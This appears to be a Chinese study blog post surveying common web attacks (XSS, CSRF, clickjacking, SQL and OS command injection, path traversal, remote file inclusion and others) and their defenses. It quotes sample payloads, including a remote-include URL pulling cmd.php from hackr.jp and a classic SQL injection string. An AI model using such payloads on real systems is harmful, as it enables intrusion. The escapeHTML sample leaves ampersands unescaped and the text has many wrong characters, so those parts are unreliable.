常见的Web攻击及防护办法 - 重学计算机网络系列(5)

Web攻击分类

简单的HTTP协议自己并不存在安全性问题，所以协议自己几乎不会成为攻击的对象。应用HTTP协议的服务器和客户端，以及运行在服务器上的Web应用等资源才是攻击目标。

web应用的攻击模式有如下两种

• 主动攻击(主要攻击服务器上的资源)
  • SQL注入攻击
  • OS命令注入攻击
  • 其余
• 被动攻击(主要攻击用户的资源和权限)
  • 跨站脚本攻击
  • 跨站点请求伪造
  • 点击劫持（与跨站请求伪造手法类似）
  • HTTP首部注入攻击
  • 其余

跨站脚本攻击（XSS）

跨站脚本攻击（XSS）是指经过存在安全漏洞的Web网站注册用户的浏览器内运行非法的HTML标签或JavaScript进行的一种攻击。动态建立的HTML部分有可能隐藏着安全漏洞。就这样，攻击者编写脚本设下陷阱，用户在本身的浏览器上运行时，一不当心就会受到被动攻击。目的：利用网站漏洞从用户那里恶意盗取信息。

XSS攻击，一般指黑客经过“HTML注入”篡改了网页，插入了恶意的脚本，从而在用户浏览网页时，控制用户浏览器的一种攻击。在一开始，这种攻击的演示案例是跨域的，因此叫作“跨站脚本”。可是发展到今天，因为JavaScript的强大功能以及网站前端应用的复杂化，是否跨域已经再也不重要。可是因为历史缘由，XSS这个名字却一直保留下来。

XSS分类

• 反射型XSS（非持久型XSS）
• DOM型XSS（非持久性XSS）
• 存储型XSS（持久性XSS攻击）

反射型XSS

• 攻击构造出特殊的 URL ，其中包含恶意代码。（这个恶意代码诸如第三方的JS或document.cookie等）
• 用户被诱导打开带有恶意代码的 URL，服务器端将恶意代码从 URL 中取出当作参数处理，而后返回给用户带有恶意代码的数据。
• 用户浏览器接收到响应解析执行，混在其中的恶意代码也被执行。
• 恶意代码窃取用户敏感数据发送给攻击者，或者冒充用户的行为，调用目标网站接口执行攻击者指定的操做。

DOM型XSS

从效果上来讲也是反射型XSS，单独划分出来，是由于DOM Based XSS的造成缘由比较特别，发现它的安全专家专门提出了这种类型的XSS。出于历史缘由，也就把它单独做为一个分类了。

• 攻击者构造出特殊的 URL，其中包含恶意代码。
• 用户被诱导打开带有恶意代码的 URL。
• 用户浏览器接收到响应后解析执行，前端 JavaScript 取出 URL 中的恶意代码并执行。
• 恶意代码窃取用户数据并发送到攻击者的网站，或者冒充用户的行为，调用目标网站接口执行攻击者指定的操做。

存储型XSS

存储型 XSS 跟 反射型 XSS 的区别是：存储型 XSS 的恶意代码存在服务器上，反射型 XSS 的恶意代码存在 URL 里。它是最危险的一种跨站脚本。比反射性 XSS 和 DOM 型 XSS 都更有隐蔽性，由于它不须要用户手动触发。任何容许用户存储数据的 Web 程序均可能存在存储型 XSS 漏洞。若某个页面遭受存储型 XSS 攻击，全部访问该页面的用户都会被 XSS 攻击。

• 攻击者把恶意代码提交到目标网站的服务器中。
• 用户打开目标网站，网站服务器端把带有恶意代码的数据取出，当作正常数据返回给用户。
• 用户浏览器接收到响应解析执行，混在其中的恶意代码也被执行。
• 恶意代码窃取用户敏感数据发送给攻击者，或者冒充用户的行为，调用目标网站接口执行攻击者指定的操做。

防护方法

• 浏览器自带防护（X-XSS-Protection）
  HTTP X-XSS-Protection 响应头是 Internet Explorer，Chrome 和 Safari 的一个功能，当检测到跨站脚本攻击(XSS)时，浏览器将中止加载页面。其原理是检查 URL 和 DOM 中元素的相关性，但这并不能彻底防止反射型 XSS，并且也并非全部浏览器都支持 X-XSS-Protection。

X-XSS-Protection: 0     
禁止XSS过滤。     

X-XSS-Protection: 1       
启用XSS过滤（一般浏览器是默认的）。 若是检测到跨站脚本攻击，浏览器将清除页面（删除不安全的部分）。  

X-XSS-Protection: 1; mode=block  
启用XSS过滤。 若是检测到攻击，浏览器将不会清除页面，而是阻止页面加载。  

X-XSS-Protection: 1; report=<reporting-uri>    
启用XSS过滤。 若是检测到跨站脚本攻击，浏览器将清除页面并使用CSP report-uri指令的功能发送违规报告。  
复制代码

• 转义
  XSS攻击主要是经过构造特殊字符来注入脚本。因此在客户端与服务端都进行输入检测，而后对用户输入的数据进行转义。

function escapeHTML(str) {
    if (!str) return '';
    str = str.replace(/&/g, "&");
    str = str.replace(/</g, "&lt;");
    str = str.replace(/>/g, "&gt;");
    str = str.replace(/"/g, "&quot;"); str = str.replace(/'/g, "&#39;");
    return str;
};
复制代码

• 过滤
  在富文本中由于须要保留 HTML ，因此咱们不能使用转义的方法防护 XSS 攻击，这里使用过滤的方式防护 XSS 攻击，也就是经过只使用白名单容许的 HTML 标记及其属性，来防护攻击。

• 内容安全策略（csp）
  实质是白名单策略，开发者明确告诉客户端，哪些外部资源能够加载和执行，大大加强了网页的安全性。

跨站请求伪造（CSRF）

叫作“攻击者伪造请求”，更好理解。

• 用户登陆一些官方网站。
• 攻击者伪造一个连接或事件，诱导用户去点击。
• 用户触发事件后（点击或者触发其余什么事件），执行操做。用户执行了表面的操做，实际上攻击者利用用户触发这个事件，伪造用户在官方网站作一些事情。

例子

• 张三登陆了购物网站。
• 以后张三不当心点击了攻击者的恶意连接。
• 在点击连接以后，张三的购物车被清空。此时，张三还并不知情。

分析攻击者为何能成功

• 张三若是第一次登陆购物网站，网站要求用户输入用户名和命名，验证正确才能进入。
• 此时购物网站在张三登陆成功以后，会给张三Cookie（里面有Session ID），下次张三登陆的时候能够没必要输入用户名密码，靠着Session ID 就能够直接进入。
• 若张三点击了攻击者的事件以后，其实就是伪造用户去进入购物网站而后执行一些操做。（利用张三的权限去作事情）
• 此时购物网站的服务器会认为是张三本人在作的一些操做，由于有Session ID。

CSRF特色

• 攻击通常发起在第三方网站，而不是被攻击的网站。
• 攻击是利用受害者在被攻击网站的登陆凭证，冒充受害者提交操做，仅仅是“冒用”，而不是直接窃取数据。
• 攻击者预测出被攻击的网站接口的全部参数，成功伪造请求。

防护方法

• SameSite 属性
  Cookie 的 SameSite 属性用来限制第三方 Cookie，从而减小安全风险，能够用来防止 CSRF 攻击和用户追踪。

• 同源检测
  在 HTTP 协议中，每个异步请求都会携带两个 Header ，用于标记来源域名：

  • Origin Header
  • Referer Header

这两个 Header 在浏览器发起请求时，大多数状况会自动带上，而且不能由前端自定义内容。 服务器能够经过解析这两个 Header 中的域名，肯定请求的来源域。

经过校验请求的该字段，咱们能知道请求是不是从本站发出的。咱们能够经过拒绝非本站发出的请求，来避免了 CSRF 攻击。

点击劫持

点击劫持是一种视觉上的欺骗手段。攻击者使用一个透明的、不可见的iframe，覆盖在一个网页上，而后诱使用户在该网页上进行操做，此时用户将在不知情的状况下点击透明的iframe页面。经过调整iframe页面的位置，能够诱使用户刚好点击在iframe页面的一些功能性按钮上。

原理很简单：

• 经过z-index属性让其位于最上层。
• 经过opacity属性让其透明度为0。

点击劫持攻击与CSRF攻击（详见“跨站点请求伪造”一章）有殊途同归之妙，都是在用户不知情的状况下诱使用户完成一些动做。可是在CSRF攻击的过程当中，若是出现用户交互的页面，则攻击可能会没法顺利完成。与之相反的是，点击劫持没有这个顾虑，它利用的就是与用户产生交互的页面。

Flash点击劫持

案例：

• 攻击者制做了一个Flash游戏，并诱使用户来玩这个游戏。这个游戏就是让用户去点击“CLICK”按钮，每次点击后这个按钮的位置都会发生变化。
• 在其上隐藏了一个看不见的iframe。
• 攻击经过诱导用户鼠标点击的位置，可以完成一些较为复杂的流程。
• 最终经过这一步步的操做，打开了用户的摄像头。

其余的点击劫持

• 图片覆盖攻击
• 拖拽劫持
• 触屏劫持（发生在智能手机上的攻击）

HTTP首部注入攻击

HTTP首部注入攻击（HTTP Header Injection）是指攻击者经过在响应首部字段内插入换行，添加任意响应首部或主体的一种攻击。属于被动攻击模式。

向首部主体内添加内容的攻击称为HTTP响应截断攻击（HTTP Response Splitting Attack）。

以下所示，Web应用有时会把从外部接收到的数值，赋给响应首部字段Location和Set-Cookie。

Loaction: http://www.example.com/a.cgi?q=12345  
Set-Cookie: UID=12345
复制代码

危害

• 设置任何Cookie信息
• 重定向至任意URL
• 显示任意的主体（HTTP响应截断攻击）

SQL注入攻击

注入攻击的本质，是把用户输入的数据当作代码执行。这里有两个关键条件，第一个是用户可以控制输入；第二个是本来程序要执行的代码，拼接了用户输入的数据。

所谓SQL注入，就是经过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。具体来讲，它是利用现有应用程序，将（恶意）的SQL命令注入到后台数据库引擎执行的能力，它能够经过在Web表单中输入（恶意）SQL语句获得一个存在安全漏洞的网站上的数据库，而不是按照设计者意图去执行SQL语句。

SQL注入攻击指的是经过构建特殊的输入做为参数传入Web应用程序，而这些输入大都是SQL语法里的一些组合，经过执行SQL语句进而执行攻击者所要的操做，其主要缘由是程序没有细致地过滤用户输入的数据，导致非法数据侵入系统。

好比先前的不少影视网站泄露VIP会员密码大多就是经过WEB表单递交查询字符暴出的，这类表单特别容易受到SQL注入式攻击．

如何防护SQL注入攻击

• 使用预编译语句，绑定变量。（最佳方式）

使用预编译的SQL语句，SQL语句的语义不会发生改变。在SQL语句中，变量用？表示，攻击者没法改变SQL的结构，在上面的例子中，即便攻击者插入相似于tom' or'1'='1的字符串，也只会将此字符串当作username来查询。

• 使用安全的存储过程对抗SQL注入。

使用存储过程的效果和使用预编语句译相似，其区别就是存储过程须要先将SQL语句定义在数据库中。但须要注意的是，存储过程当中也可能会存在注入问题，所以应该尽可能避免在存储过程内使用动态的SQL语句。若是没法避免，则应该使用严格的输入过滤或者是编码函数来处理用户的输入数据。

• 检查数据类型

检查输入数据的数据类型，在很大程度上能够对抗SQL注入。好比用户在输入邮箱时，必须严格按照邮箱的格式；输入时间、日期时，必须严格按照时间、日期的格式，等等，都能避免用户数据形成破坏。但数据类型检查并不是万能，若是需求就是须要用户提交字符串，好比一段短文，则须要依赖其余的方法防范SQL注入。

• 使用安全函数
• 使用最小权限原则，避免Web应用直接使用root、dbowner等高权限帐户直接链接数据库。
  若是有多个不一样的应用在使用同一个数据库，则也应该为每一个应用分配不一样的帐户。Web应用使用的数据库帐户，不该该有建立自定义函数、操做本地文件的权限。

OS命令注入攻击

OS命令注入攻击（OS Command Injection）是指经过Web应用，执行非法的操做系统命令达到攻击的目的。只要在能调用Shell函数的地方就有存在被攻击的风险。

OS命令注入攻击能够向Shell发送命令，让Windows或Linux操做系统的命令行启动程序。也就是说，经过OS注入攻击可执行OS上安装着的各类程序。

产生的缘由

• 使用了内部调用Shell的函数（system、open等）
• 将倍加传入的参数传递给内部调用的shell的函数
• 参数中shell的元字符没有被转义

防护对策

• 选择不调用OS命令的实现方法。不调用利用shell的功能，既能杜绝了OS命令注入漏洞混入的可能性，又消除了调用OS命令的而系统开销，可以从多方面提升应用的性能。
• 不将外界输入的字符串传递给命令行参数。
• 使用安全的函数对传递给OS命令参数进行转义。

其余一些Web攻击

目录遍历攻击

目录遍历（Directory Traversal）攻击是指对本无心公开的文件目录，经过非法截断其目录路径后，达成访问目的的一种攻击。这种攻击有时也称为路径遍历（PathTraversal）攻击。

经过Web应用对文件处理操做时，在由外部指定文件名的处理存在疏漏的状况下，用户可以使用．../等相对路径定位到/etc/passed等绝对路径上，所以服务器上任意的文件或文件目录皆有可能被访问到。这样一来，就有可能非法浏览、篡改或删除Web服务器上的文件。

当然存在输出值转义的问题，但更应该关闭指定对任意文件名的访问权限。

远程文件包含漏洞

远程文件包含漏洞（Remote File Inclusion）是指当部分脚本内容须要从其余文件读入时，攻击者利用指定外部服务器的URL充当依赖文件，让脚本读取以后，就可运行任意脚本的一种攻击。

这主要是PHP存在的安全漏洞，对PHP的include或require来讲，这是一种可经过设定，指定外部服务器的URL做为文件名的功能。可是，该功能太危险，PHP5.2.0以后默认设定此功能无效。

当然存在输出值转义的问题，但更应控制对任意文件名的指定。

源代码：
http://example.com/foo.php?mod=news.php

通过攻击后：
http://example.com/foo.php?mod=http://hackr.jp/cmd.php&cmd=1s
复制代码

攻击者经过把要引入的文件替换成本身的文件，就能攻击到服务器了。

不正确的错误消息处理

不正确的错误消息处理（Error Handling Vulnerability）的安全漏洞是指，Web应用的错误信息内包含对攻击者有用的信息。与Web应用有关的主要错误信息以下所示。

• Web应用抛出的错误消息
• 数据库等系统抛出的错误消息

Web应用没必要在用户的浏览画面上展示详细的错误消息。对攻击者来讲，详细的错误消息有可能给他们下一次攻击以提示。

开放重定向

开放重定向（Open Redirect）是一种对指定的任意URL做重定向跳转的功能。而与此功能相关联的安全漏洞是指，假如指定的重定向URL到某个具备恶意的Web网站，那么用户就会被诱导至那个Web网站。

原URL：
http://example.com/?redirect=http://www.tricorder.jp

被攻击后：
http://example.com/?redirect=http://hackr.jp
复制代码

用户看到URL后原觉得访问example.com，不料实际上被诱导至hackr.jp这个指定的重定向目标。

可信度高的Web网站若是开放重定向功能，则颇有可能被攻击者选中并用来做为钓鱼攻击的跳板。

密码破解

密码破解攻击（Password Cracking）即算出密码，突破认证。攻击不只限于Web应用，还包括其余的系统（如FTP或SSH等）。有如下几种破解方法：

• 穷举法
  对全部密钥集合构成的密钥空间（Keyspace）进行穷举。即，用全部可行的候选密码对目标的密码系统试错，用以突破验证的一种攻击。
• 字典攻击
  利用事先收集好的候选密码（通过各类组合方式后存入字典），枚举字典中的密码，尝试经过认证的一种攻击手法。

字典攻击中有一种利用其余Web网站已泄露的ID及密码列表进行的攻击。不少用户习惯随意地在多个Web网站使用同一套ID及密码，所以攻击会有至关高的成功概率

DoS攻击

DoS攻击（Denial of Service attack）是一种让运行中的服务呈中止状态的攻击。有时也叫作服务中止攻击或拒绝服务攻击。DoS攻击的对象不只限于Web网站，还包括网络设备及服务器等。

有两种DOS攻击方式：

• 集中利用访问请求形成资源过载，资源用尽的同时，实际上服务也就呈中止状态。（海量请求致使服务器瘫痪,服务器很难分辨何为正常请求，何为攻击请求，所以很难防止DoS攻击。）
• 经过攻击安全漏洞使服务中止。

多台计算机发起的DoS攻击称为DDoS攻击（DistributedDenial of Service attack）。DDoS攻击一般利用那些感染病毒的计算机做为攻击者的攻击跳板。

后门程序

后门程序（Backdoor）是指开发设置的隐藏入口，可不按正常步骤使用受限功能。利用后门程序就可以使用本来受限制的功能。

一般的后门程序分为如下3种类型。

• 开发阶段做为Debug调用的后门程序
• 开发者为了自身利益植入的后门程序
• 攻击者经过某种方法设置的后门程序

可经过监视进程和通讯的状态发现被植入的后门程序。但设定在Web应用中的后门程序，因为和正常使用时区别不大，一般很难发现。

参考文献

• 《图解HTTP》
• 吴瀚清《白帽子讲Web安全》
• 跨站脚本攻击—XSS
• 跨站请求伪造—CSRF

结语

个人计算机网络学习之旅暂时就结束了。由于大四还在实习，白天还须要完成公司的任务，只能在晚上或者周末去公司自主学习，前先后后大约有花一两个月的时间。收获不少，这种感受与当初上计算机网络课的感受彻底不同，当时上了也就上了，知识都是零零散散的，都没有去串联起来，致使记得不深入。现在花了心思去整理总结后，有种融会贯通的感受，在Chrome调试，项目中先后端对接，性能优化方面的认知更为巩固和深入。